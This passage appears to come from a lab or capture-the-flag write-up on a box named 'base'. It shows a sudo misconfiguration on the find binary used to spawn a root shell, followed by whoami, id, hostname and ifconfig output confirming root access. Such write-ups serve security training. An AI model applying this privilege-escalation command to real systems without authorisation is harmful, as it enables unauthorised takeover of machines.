Find
I have discovered that the john user is able to execute the binary, find, as the root user
according to the gtfobins find can be used to escalate privileges if allowed to run as root
john@base:~$ sudo find . -exec /bin/sh \; -quit
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
# hostname
base
# ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.129.95.184 netmask 255.255.0.0 broadcast 10.129.255.255
inet6 dead:beef::250:56ff:fe96:61b0 prefixlen 64 scopeid 0x0<global>
inet6 fe80::250:56ff:fe96:61b0 prefixlen 64 scopeid 0x20<link>
ether 00:50:56:96:61:b0 txqueuelen 1000 (Ethernet)
RX packets 1344123 bytes 238177591 (238.1 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 1280625 bytes 579406181 (579.4 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 18797 bytes 1614151 (1.6 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 18797 bytes 1614151 (1.6 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0System Level Compromise